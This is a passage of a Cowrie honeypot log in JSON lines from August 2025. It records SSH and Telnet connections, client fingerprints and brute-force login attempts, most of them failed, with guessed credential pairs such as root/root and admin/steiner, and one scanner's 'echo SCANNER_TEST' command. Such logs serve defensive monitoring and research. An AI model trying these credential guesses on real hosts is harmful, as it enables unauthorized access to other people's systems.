{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61840,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf1cb88bd8b3","protocol":"ssh","message":"New connection: 212.227.125.160:61840 (1.2.3.4:22) [session: cf1cb88bd8b3]","sensor":"my-vps","timestamp":"2025-08-26T06:11:48.408933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:11:48.409793Z","src_ip":"212.227.125.160","session":"cf1cb88bd8b3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:11:48.572761Z","src_ip":"212.227.125.160","session":"cf1cb88bd8b3"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:11:48.737903Z","src_ip":"212.227.125.160","session":"cf1cb88bd8b3"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":59592,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b4c104ab47c","protocol":"ssh","message":"New connection: 134.199.225.42:59592 (1.2.3.4:22) [session: 5b4c104ab47c]","sensor":"my-vps","timestamp":"2025-08-26T06:12:19.174085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:12:19.175051Z","src_ip":"134.199.225.42","session":"5b4c104ab47c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:12:19.331708Z","src_ip":"134.199.225.42","session":"5b4c104ab47c"}
{"eventid":"cowrie.login.failed","username":"db2inst3","password":"db2inst3","message":"login attempt [db2inst3/db2inst3] failed","sensor":"my-vps","timestamp":"2025-08-26T06:12:20.000876Z","src_ip":"134.199.225.42","session":"5b4c104ab47c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:12:21.160411Z","src_ip":"134.199.225.42","session":"5b4c104ab47c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57054,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6117b41d6a3","protocol":"ssh","message":"New connection: 217.72.205.35:57054 (1.2.3.4:22) [session: c6117b41d6a3]","sensor":"my-vps","timestamp":"2025-08-26T06:12:36.995915Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:12:36.997603Z","src_ip":"217.72.205.35","session":"c6117b41d6a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33858,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f6d084f7645","protocol":"telnet","message":"New connection: 212.227.235.229:33858 (1.2.3.4:23) [session: 1f6d084f7645]","sensor":"my-vps","timestamp":"2025-08-26T06:13:15.853696Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":48832,"dst_ip":"1.2.3.4","dst_port":22,"session":"de0a3d0d8b9d","protocol":"ssh","message":"New connection: 134.199.225.42:48832 (1.2.3.4:22) [session: de0a3d0d8b9d]","sensor":"my-vps","timestamp":"2025-08-26T06:13:16.942204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:13:16.942920Z","src_ip":"134.199.225.42","session":"de0a3d0d8b9d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:13:17.102921Z","src_ip":"134.199.225.42","session":"de0a3d0d8b9d"}
{"eventid":"cowrie.login.failed","username":"pon","password":"pon","message":"login attempt [pon/pon] failed","sensor":"my-vps","timestamp":"2025-08-26T06:13:17.786207Z","src_ip":"134.199.225.42","session":"de0a3d0d8b9d"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T06:13:17.834423Z","src_ip":"212.227.235.229","session":"1f6d084f7645"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:13:18.948784Z","src_ip":"134.199.225.42","session":"de0a3d0d8b9d"}
{"eventid":"cowrie.session.closed","duration":4.763797998428345,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:13:20.617389Z","src_ip":"212.227.235.229","session":"1f6d084f7645"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33866,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c9ddc85e5bf","protocol":"telnet","message":"New connection: 212.227.235.229:33866 (1.2.3.4:23) [session: 1c9ddc85e5bf]","sensor":"my-vps","timestamp":"2025-08-26T06:13:20.867581Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:13:21.525638Z","src_ip":"212.227.235.229","session":"1c9ddc85e5bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:13:21.582870Z","src_ip":"212.227.235.229","session":"1c9ddc85e5bf"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T06:13:21.965653Z","src_ip":"212.227.235.229","session":"1c9ddc85e5bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:13:23.048478Z","src_ip":"212.227.235.229","session":"1c9ddc85e5bf"}
{"eventid":"cowrie.session.closed","duration":2.1866610050201416,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:13:23.054163Z","src_ip":"212.227.235.229","session":"1c9ddc85e5bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49552,"dst_ip":"1.2.3.4","dst_port":22,"session":"26e56da4def3","protocol":"ssh","message":"New connection: 212.227.125.160:49552 (1.2.3.4:22) [session: 26e56da4def3]","sensor":"my-vps","timestamp":"2025-08-26T06:13:33.140095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:13:33.141111Z","src_ip":"212.227.125.160","session":"26e56da4def3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:13:33.376017Z","src_ip":"212.227.125.160","session":"26e56da4def3"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:13:34.095736Z","src_ip":"212.227.125.160","session":"26e56da4def3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:13:34.320547Z","src_ip":"212.227.125.160","session":"26e56da4def3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48120,"dst_ip":"1.2.3.4","dst_port":22,"session":"58ee0e6d88e6","protocol":"ssh","message":"New connection: 212.227.235.229:48120 (1.2.3.4:22) [session: 58ee0e6d88e6]","sensor":"my-vps","timestamp":"2025-08-26T06:14:03.302721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:14:03.303407Z","src_ip":"212.227.235.229","session":"58ee0e6d88e6"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:14:03.544199Z","src_ip":"212.227.235.229","session":"58ee0e6d88e6"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:14:04.530502Z","src_ip":"212.227.235.229","session":"58ee0e6d88e6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:14:04.770104Z","src_ip":"212.227.235.229","session":"58ee0e6d88e6"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":55052,"dst_ip":"1.2.3.4","dst_port":22,"session":"686302787520","protocol":"ssh","message":"New connection: 134.199.225.42:55052 (1.2.3.4:22) [session: 686302787520]","sensor":"my-vps","timestamp":"2025-08-26T06:14:17.504819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:14:17.506036Z","src_ip":"134.199.225.42","session":"686302787520"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:14:17.663774Z","src_ip":"134.199.225.42","session":"686302787520"}
{"eventid":"cowrie.login.failed","username":"rpc","password":"rpc","message":"login attempt [rpc/rpc] failed","sensor":"my-vps","timestamp":"2025-08-26T06:14:18.333029Z","src_ip":"134.199.225.42","session":"686302787520"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:14:19.492385Z","src_ip":"134.199.225.42","session":"686302787520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50720,"dst_ip":"1.2.3.4","dst_port":23,"session":"32cffb91056f","protocol":"telnet","message":"New connection: 212.227.235.229:50720 (1.2.3.4:23) [session: 32cffb91056f]","sensor":"my-vps","timestamp":"2025-08-26T06:14:27.540078Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51871,"dst_ip":"1.2.3.4","dst_port":23,"session":"7141bb64b752","protocol":"telnet","message":"New connection: 212.227.235.229:51871 (1.2.3.4:23) [session: 7141bb64b752]","sensor":"my-vps","timestamp":"2025-08-26T06:14:46.127337Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":51707,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1a360c19491","protocol":"ssh","message":"New connection: 80.94.95.112:51707 (1.2.3.4:22) [session: b1a360c19491]","sensor":"my-vps","timestamp":"2025-08-26T06:14:50.724579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T06:14:50.725222Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T06:14:50.756206Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.login.failed","username":"admin","password":"streak","message":"login attempt [admin/streak] failed","sensor":"my-vps","timestamp":"2025-08-26T06:14:50.962942Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.login.failed","username":"admin","password":"steiner","message":"login attempt [admin/steiner] failed","sensor":"my-vps","timestamp":"2025-08-26T06:14:51.995911Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.login.failed","username":"admin","password":"stefania","message":"login attempt [admin/stefania] failed","sensor":"my-vps","timestamp":"2025-08-26T06:14:53.029723Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.login.failed","username":"admin","password":"stefani","message":"login attempt [admin/stefani] failed","sensor":"my-vps","timestamp":"2025-08-26T06:14:54.063984Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.login.failed","username":"admin","password":"soviet","message":"login attempt [admin/soviet] failed","sensor":"my-vps","timestamp":"2025-08-26T06:14:55.096777Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:14:56.130749Z","src_ip":"80.94.95.112","session":"b1a360c19491"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64419,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccf5209988d5","protocol":"ssh","message":"New connection: 212.227.235.229:64419 (1.2.3.4:22) [session: ccf5209988d5]","sensor":"my-vps","timestamp":"2025-08-26T06:14:56.166523Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:14:56.339811Z","src_ip":"212.227.235.229","session":"ccf5209988d5"}
{"eventid":"cowrie.session.closed","duration":30.58255696296692,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:14:58.122567Z","src_ip":"212.227.235.229","session":"32cffb91056f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":34808,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c0debda24d3","protocol":"ssh","message":"New connection: 134.199.225.42:34808 (1.2.3.4:22) [session: 3c0debda24d3]","sensor":"my-vps","timestamp":"2025-08-26T06:15:28.220720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:15:28.221928Z","src_ip":"134.199.225.42","session":"3c0debda24d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:15:28.379622Z","src_ip":"134.199.225.42","session":"3c0debda24d3"}
{"eventid":"cowrie.login.failed","username":"joggler","password":"joggler","message":"login attempt [joggler/joggler] failed","sensor":"my-vps","timestamp":"2025-08-26T06:15:29.052389Z","src_ip":"134.199.225.42","session":"3c0debda24d3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:15:30.213219Z","src_ip":"134.199.225.42","session":"3c0debda24d3"}
{"eventid":"cowrie.session.closed","duration":46.10634708404541,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:15:32.233611Z","src_ip":"212.227.235.229","session":"7141bb64b752"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":47356,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc313877f905","protocol":"ssh","message":"New connection: 139.19.117.131:47356 (1.2.3.4:22) [session: cc313877f905]","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.079043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.079913Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","e